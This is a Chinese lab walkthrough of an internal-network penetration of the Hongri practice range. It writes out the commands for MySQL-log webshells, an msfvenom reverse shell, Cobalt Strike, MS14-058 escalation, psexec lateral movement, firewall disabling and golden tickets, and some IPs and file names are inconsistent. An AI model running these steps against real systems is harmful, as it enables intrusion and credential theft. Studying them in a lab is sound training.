文章总结: 文章完整复现红日靶场(棉花糖)内网渗透流程:从phpMyAdmin弱口令、日志写Shell、CMS后台GetShell,到MSF/CS上线、域信息收集、MS14-058提权、SMB横向psexec、黄金票据权限维持,提供每一步命令与截图,可操作性强。
综合评分: 92
文章分类: 红队,内网渗透,渗透测试,实战经验,安全工具
文末工具推荐 | 红日靶场(棉花糖)
原创
h1ph0p
迷人安全
2026年1月8日 14:57
浙江
文章介绍:
靶机介绍:
https://vip.bdziyi.com/ulab/
红日靶场(棉花糖)
目标主机:192.168.111.20
我的主机:192.168.111.25
首先目录扫描一下,御剑和dirsearch之后发现有phpadmin,尝试root/root弱口令登录,发现登录成功。
还泄露了一套源码
打开看是yxcms的网站源码,也就是说有CMS
下一步准备利用phpadmin的日志文件写入shell进行getshell
先看mysql日志开没开启
命令是show global variables like ‘%general%’;
发现并没有开启,所以我们要开启mysql日志
命令是set global general_log=’on’;
再检验一下是否开启mysql日志
发现已经开启了,这时候要查询sql数据库的路径,然后上shell
查看路径的命令是select @@basedir;
MySQL的路径是C:/phpstudy/MysQL/
然后设置木马写入的路径set global general_log_file =”C:/phpStudy/WWW/shell.php”
然后写入木马,命令是select “”
然后访问192.168.111.20/shell.php,用蚁剑连接。
连接成功
之前御剑扫出来他有一个cms,打开看看,蚁剑连接之后也能发现www下的yxcms,所以打开Yxcms建站系统演示站看看
发现首页泄露了网站的后台管理系统的访问url路径和默认账号密码,用它给的默认账号密码试试能不能登录成功
发现可以登录成功,之后在前台模板界面发现可以编辑PHP,随便找个php写个shell
保存后,接下来就要想办法找到这个info.php所在的目录了,先用御剑扫描一下后台。
扫到了目录泄露
成功找到之前info.php的路径,准备蚁剑连接
连接成功,之后用msf生成shell.php,
命令是msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.31.133 lport=5566 -f exe -o shell.exe
生成shell.php之后通过蚁剑上传
接着我们在kali上开启监听模式,持续监听连接
Msfconsole
use exploit/multi/handler
这个的作用是启动监听器
set payload windows/x64/meterpreter/reverse_tcp
这个命令的作用是为我配置一个攻击载荷,这个载荷将在Windows上运行
set lhost 192.168.111.25
这个命令作用是将监听器的本地监听地址为192.168.111.25,也就是攻击者的机器
set lport 5566
这个命令的作用是告诉监听器要在哪个端口上等待连接
Run
这个命令是启动监听
然后用蚁剑运行shell.php
为什么是0.0.0.0呢,因为我打的是棉花糖的靶场,因为连接vpn后分配的ip是
vpn服务内部IP,为10.8.0.0段,msf在本地找不到192.168.111.25所以报错并自动转移监听到了0.0.0.0,也就是全部地址
这波成功上线,权限维持,之后就是收集域内信息
先判断是否存在域,使用命令ipconfig /all来查看DNS服务器,我们确实发现了域god.org
注意:一开始在电脑上连接openvpn,如果之后在kali上连接,就把电脑上的关了,要不然cs会一会连接一会消失。
可以whoami来看看
拿到admin权限并且域控主机名叫god
接下来查看域内主机net view
结果不行,那么咱们直接换方法,cs上线
首先进入cs服务端的目录
棉花糖的靶场,他不放在公网上,导致cs上线不一样
首先把靶场下载的openvpn放在kali里面命令是openvpn –config ?.vpn
这个?就是openvpn的前缀,
如果这个命令出错,那就用 openvpn “2901 (1).ovpn” ,我就是这个命令成功的
然后开启cs服务端,命令是 ./teamserver 127.0.0.2 123456
然后显示端连接的ip是kali的ip
然后设置监听器,设置两个
第二个会报错,但是不用管,因为我们只用第二个生成shell
这就成功生成了,把shell通过蚁剑上传
执行beacon_x64.exe
发现cs成功上线
检查防火墙是否关闭
shell netsh advfirewall show allprofiles
进行权限提升,从admin提升到system,利用MS14-058漏洞,把回连间隔调成1s,实战不建议,因为容易被发现。
可见是关闭的,开始信息搜集
shell ipconfig //查看网络
他的内网段是52
shell net user //查看本地用户
shell net view //列举计算机名
shell net config Workstation //来查看当前计算机名、域、登录域等信息
shell net view /domain //看看几个域
也可以ping的方式
抓取明文密码
然后扫他的端口
发现445端口开放(SMB 服务),可尝试通过psexec、smbexec等工具横向
发现445端口,可以创建SMB监听隧道
1.SMB监听隧道的核心原理是利用SMB协议在目标主机上建立隐蔽的通信通道,绕过传统防火墙和入侵检测系统的监控。
2.SMB协议基础:文件共享,域名解析等,默认通过445端口通信
配置MSB
切换攻击列表
然后右键选择横向移动选择psexec
监听器选择SMB,隧道选择system那个
成功横向移动,然后关闭防火墙
shell netsh advfirewall set allprofiles state off
接下来就是权限维持利用黄金票据
Hashdump这个命令获取哈希
logonpasswords这个命令获取SID
然后直接填在黄金票据上就行
黄金票据成功,权限维持成功
红日靶场渗透完成
文末工具推荐:
文件去重助手,作者是正好用于去重POC写的,大家可以拿来用,挺方便的,公众号后台回复2618即可
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:迷人安全 h1ph0p《文末工具推荐 | 红日靶场(棉花糖)》